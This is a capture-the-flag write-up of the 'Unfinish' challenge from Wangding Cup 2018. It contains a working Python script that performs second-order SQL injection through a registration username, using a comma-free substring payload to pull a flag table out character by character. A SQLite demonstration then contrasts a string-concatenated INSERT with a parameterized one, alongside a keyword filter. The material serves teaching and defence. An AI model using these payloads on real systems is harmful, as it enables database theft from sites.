[Wangding Cup 2018] Unfinish


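Registration takes an email, a username and a password, while login takes only the email and password. After logging in, the username is displayed on the page, which suggests a second-order injection through the username field.

Commas and `information` are filtered, so information_schema cannot be used. The guess is that the flag is in a table named flag.
Here is the script: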

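#coding:utf-8
import requests
from bs4 import BeautifulSoup
import time


url = 'http://2a3b6044-d59f-4a4f-ba8c-8c06a64cc813.node3.buuoj.cn/'

m = ''  # flag characters recovered so far
for i in range(100):
    # The stored username evaluates to the ASCII code of character i+1 of the flag.
    # "from {} for 1" is the comma-free form of substr, needed because commas are filtered.
    payload = "0'+ascii(substr((select * from flag) from {} for 1))+'0".format(i+1)
    register = {'email':'abc{}@qq.com'.format(i),'username':payload,'password':'123456'}
    login = {'email':'abc{}@qq.com'.format(i),'password':'123456'}
    req = requests.session()
    r1 = req.post(url+'register.php',data = register)  # one new account per character
    r2 = req.post(url+'login.php', data = login)
    r3 = req.post(url+'index.php')  # the home page displays the stored username
    html = r3.text
    soup = BeautifulSoup(html,'html.parser')
    UserName = soup.span.string.strip()
    if int(UserName) == 0:  # ascii('') is 0, so we are past the end of the flag
        break
    m += chr(int(UserName))
    print(m)
    time.sleep(1)  # throttle the requests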

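The 0 on each side of the payload is there to prevent an error: the username lands inside a quoted string, so the leading `0'` and trailing `'0` keep the quotes balanced and the whole value is evaluated as a numeric addition.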
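The same root cause and its fix, as an added example that is not part of the original write-up. It assumes the registration INSERT is built by string concatenation (the page does not show the server code) and models it with an in-memory SQLite database instead of the challenge's MySQL, so `unicode()` stands in for `ascii(substr(...))`; the table layout, function names and flag value are constructed.

```python
import sqlite3

BLACKLIST = (",", "information")  # the two filtered tokens the write-up mentions

def passes_blacklist(value):
    """Model of the keyword filter: reject only if a listed token appears."""
    low = value.lower()
    return not any(tok in low for tok in BLACKLIST)

def make_db():
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (email TEXT, username TEXT, password TEXT)")
    db.execute("CREATE TABLE flag (flag TEXT)")
    db.execute("INSERT INTO flag VALUES ('SECRET')")  # constructed sample value
    return db

def register_concat(db, email, username, password):
    # Vulnerable (assumed server behaviour): input is spliced into the SQL text,
    # so a quote in the username ends the literal and the rest runs as SQL.
    db.execute("INSERT INTO users VALUES ('%s', '%s', '%s')"
               % (email, username, password))

def register_bound(db, email, username, password):
    # Hardened: bound parameters are always data, never statement text.
    db.execute("INSERT INTO users VALUES (?, ?, ?)", (email, username, password))

def shown_username(db, email):
    # What the post-login page would display for this account.
    row = db.execute("SELECT username FROM users WHERE email = ?",
                     (email,)).fetchone()
    return row[0]

def demo():
    # SQLite-dialect analogue of the page's payload (first character only).
    payload = "0'+unicode((select * from flag))+'0"
    db = make_db()
    register_concat(db, "a@example.test", payload, "pw")
    register_bound(db, "b@example.test", payload, "pw")
    return (passes_blacklist(payload),
            shown_username(db, "a@example.test"),
            shown_username(db, "b@example.test"),
            payload)

if __name__ == "__main__":
    ok, leaked, stored, payload = demo()
    print("filter lets it through:", ok)
    print("concatenated INSERT displays:", leaked)   # numeric code of 'S'
    print("bound INSERT displays:", stored)          # the literal string
```

The keyword filter accepts the value, the concatenated statement stores a number derived from the flag table, and the bound statement stores the username verbatim.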

Reference
https://zhuanlan.zhihu.com/p/150627938

